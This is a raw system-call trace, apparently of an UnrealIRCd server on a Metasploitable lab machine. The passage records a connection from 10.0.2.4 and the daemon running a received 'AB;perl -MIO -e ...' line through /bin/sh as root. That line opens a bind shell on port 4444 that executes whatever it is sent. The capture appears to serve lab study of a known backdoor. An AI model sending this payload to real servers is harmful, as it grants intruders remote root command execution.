4519  20:06:43.415124 select(1024, [2 3 4 7 9], [], NULL, {0, 930000}) = 0 (Timeout)
4519  20:06:44.341877 clock_gettime(CLOCK_MONOTONIC, {47614, 158899265}) = 0
4519  20:06:44.341902 gettimeofday({1495670804, 341906}, NULL) = 0
4519  20:06:44.341915 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 670000})
4519  20:06:44.671939 clock_gettime(CLOCK_MONOTONIC, {47614, 488960162}) = 0
4519  20:06:44.671960 time(NULL)        = 1495670804
4519  20:06:44.671971 time(NULL)        = 1495670804
4519  20:06:44.671983 gettimeofday({1495670804, 671987}, NULL) = 0
4519  20:06:44.671995 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})
4519  20:06:44.672033 clock_gettime(CLOCK_MONOTONIC, {47614, 489046101}) = 0
4519  20:06:44.672043 gettimeofday({1495670804, 672047}, NULL) = 0
4519  20:06:44.672054 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})
4519  20:06:44.672092 clock_gettime(CLOCK_MONOTONIC, {47614, 489104419}) = 0
4519  20:06:44.672103 accept(2, 0, NULL) = 5
4519  20:06:44.672125 getpeername(5, {sa_family=AF_INET, sin_port=htons(38063), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:06:44.672159 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:06:44.672171 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:06:44.672184 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:06:44.672196 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:06:44.672207 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:06:44.672218 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:06:44.672232 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:06:44.672248 clock_gettime(CLOCK_MONOTONIC, {47614, 489261525}) = 0
4519  20:06:44.672260 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:06:44.672272 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:06:44.672281 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:06:44.672290 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:06:44.672300 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:06:44.672345 send(6, "{n\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:06:44.672442 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:06:44.672516 gettimeofday({1495670804, 672520}, NULL) = 0
4519  20:06:44.672527 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})
4519  20:06:44.682270 clock_gettime(CLOCK_MONOTONIC, {47614, 499278834}) = 0
4519  20:06:44.682270 recvfrom(6, "{n\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0A\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:06:44.682270 close(6)          = 0
4519  20:06:44.682270 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:06:44.682271 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174
4519  20:06:44.682271 time(NULL)        = 1495670804
4519  20:06:44.682271 time(NULL)        = 1495670804
4519  20:06:44.682271 gettimeofday({1495670804, 682271}, NULL) = 0
4519  20:06:44.682272 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:06:44.682272 clock_gettime(CLOCK_MONOTONIC, {47614, 499280908}) = 0
4519  20:06:44.682272 gettimeofday({1495670804, 682272}, NULL) = 0
4519  20:06:44.682272 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 800000})
4519  20:06:44.882345 clock_gettime(CLOCK_MONOTONIC, {47614, 699354108}) = 0
4519  20:06:44.882345 recv(4, "PRIVMSG  #testit0 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55
4519  20:06:44.882345 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882346 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882346 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882346 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882346 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882347 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882347 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882347 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882347 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882347 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882348 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882348 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882348 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882348 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882349 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882374 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882389 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882403 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882417 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882431 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882445 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882459 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 120000}, ...}) = 0
4519  20:06:44.882476 gettimeofday({1495670804, 882480}, NULL) = 0
4519  20:06:44.882488 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})
4519  20:06:44.882530 clock_gettime(CLOCK_MONOTONIC, {47614, 699542547}) = 0
4519  20:06:44.882541 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:06:44.882571 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:06:44.882593 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:06:44.882606 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:06:44.882621 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10450
10450 20:06:44.882695 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
10450 20:06:44.882710 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
10450 20:06:44.882720 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
10450 20:06:44.882734 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
10450 20:06:44.882844 brk(0)            = 0x80f9000
10450 20:06:44.882877 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.891903 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f57000
10450 20:06:44.891937 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.891956 open("/etc/ld.so.cache", O_RDONLY) = 1
10450 20:06:44.891969 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
10450 20:06:44.891987 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f4f000
10450 20:06:44.891998 close(1)          = 0
10450 20:06:44.892009 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.892029 open("/lib/libncurses.so.5", O_RDONLY) = 1
10450 20:06:44.892042 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
10450 20:06:44.892135 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
10450 20:06:44.892153 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1f000
10450 20:06:44.892165 mmap2(0xb7f4c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f4c000
10450 20:06:44.892182 close(1)          = 0
10450 20:06:44.892194 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.892207 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
10450 20:06:44.892221 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
10450 20:06:44.892309 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
10450 20:06:44.892326 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1b000
10450 20:06:44.892337 mmap2(0xb7f1d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f1d000
10450 20:06:44.892352 close(1)          = 0
10450 20:06:44.892487 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.892516 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
10450 20:06:44.892545 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
10450 20:06:44.892648 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
10450 20:06:44.892665 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f1a000
10450 20:06:44.892680 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcb000
10450 20:06:44.892690 mmap2(0xb7f14000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f14000
10450 20:06:44.892705 mmap2(0xb7f17000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f17000
10450 20:06:44.892719 close(1)          = 0
10450 20:06:44.892741 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dca000
10450 20:06:44.892753 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dca6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
10450 20:06:44.892808 mprotect(0xb7f14000, 4096, PROT_READ) = 0
10450 20:06:44.892844 munmap(0xb7f4f000, 29913) = 0
10450 20:06:44.892869 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
10450 20:06:44.892884 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
10450 20:06:44.892911 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdcc790) = -1 ENOTTY (Inappropriate ioctl for device)
10450 20:06:44.892942 brk(0)            = 0x80f9000
10450 20:06:44.892951 brk(0x80fa000)    = 0x80fa000
10450 20:06:44.892962 brk(0x80fb000)    = 0x80fb000
10450 20:06:44.892978 getuid32()        = 0
10450 20:06:44.892987 getgid32()        = 0
10450 20:06:44.892996 geteuid32()       = 0
10450 20:06:44.893005 getegid32()       = 0
10450 20:06:44.893018 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
10450 20:06:44.893031 time(NULL)        = 1495670804
10450 20:06:44.893044 brk(0x80fc000)    = 0x80fc000
10450 20:06:44.893058 brk(0x80fd000)    = 0x80fd000
10450 20:06:44.893076 open("/proc/meminfo", O_RDONLY) = 1
10450 20:06:44.893098 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
10450 20:06:44.893115 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f56000
10450 20:06:44.893127 read(1, "MemTotal:      1035240 kB\nMemFree:        190412 kB\nBuffers:        140284 kB\nCached:         462264 kB\nSwapCached:          0 kB\nActive:         477188 kB\nInactive:       314204 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        190164 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            1376 kB\nWriteback:           0 kB\nAnonPages:      188824 kB\nMapped:          52012 kB\nSlab:            31640 kB\nSReclaimable:    19312 kB\nSUnreclaim:      12328 kB\nPageTables:       2904 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   707936 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
10450 20:06:44.893219 close(1)          = 0
10450 20:06:44.893231 munmap(0xb7f56000, 4096) = 0
10450 20:06:44.893243 brk(0x80fe000)    = 0x80fe000
10450 20:06:44.893268 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
10450 20:06:44.893281 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
10450 20:06:44.893293 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
10450 20:06:44.893305 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
10450 20:06:44.893317 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
10450 20:06:44.893332 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
10450 20:06:44.893345 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
10450 20:06:44.893357 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
10450 20:06:44.893369 uname({sys="Linux", node="metasploitable", ...}) = 0
10450 20:06:44.893496 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
10450 20:06:44.893530 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
10450 20:06:44.893549 brk(0x8100000)    = 0x8100000
10450 20:06:44.893560 getcwd("/etc/unreal", 4096) = 12
10450 20:06:44.893574 getpid()          = 10450
10450 20:06:44.893590 getppid()         = 4519
10450 20:06:44.893606 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
10450 20:06:44.893625 stat64("/sbin/sh", 0xbfdcc768) = -1 ENOENT (No such file or directory)
10450 20:06:44.893637 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
10450 20:06:44.893655 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
10450 20:06:44.893678 socket(PF_FILE, SOCK_STREAM, 0) = 1
10450 20:06:44.893692 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
10450 20:06:44.893703 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
10450 20:06:44.893725 close(1)          = 0
10450 20:06:44.893737 socket(PF_FILE, SOCK_STREAM, 0) = 1
10450 20:06:44.893747 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
10450 20:06:44.893756 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
10450 20:06:44.893774 close(1)          = 0
10450 20:06:44.893787 open("/etc/nsswitch.conf", O_RDONLY) = 1
10450 20:06:44.893801 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
10450 20:06:44.893817 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f56000
10450 20:06:44.893828 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
10450 20:06:44.893876 read(1, "", 4096) = 0
10450 20:06:44.893886 close(1)          = 0
10450 20:06:44.893895 munmap(0xb7f56000, 4096) = 0
10450 20:06:44.893911 open("/etc/ld.so.cache", O_RDONLY) = 1
10450 20:06:44.893923 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
10450 20:06:44.893986 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f4f000
10450 20:06:44.894011 close(1)          = 0
10450 20:06:44.894022 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.894037 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
10450 20:06:44.894052 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
10450 20:06:44.894156 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
10450 20:06:44.894173 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc1000
10450 20:06:44.894185 mmap2(0xb7dc8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dc8000
10450 20:06:44.894202 close(1)          = 0
10450 20:06:44.894214 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.894227 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
10450 20:06:44.894240 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 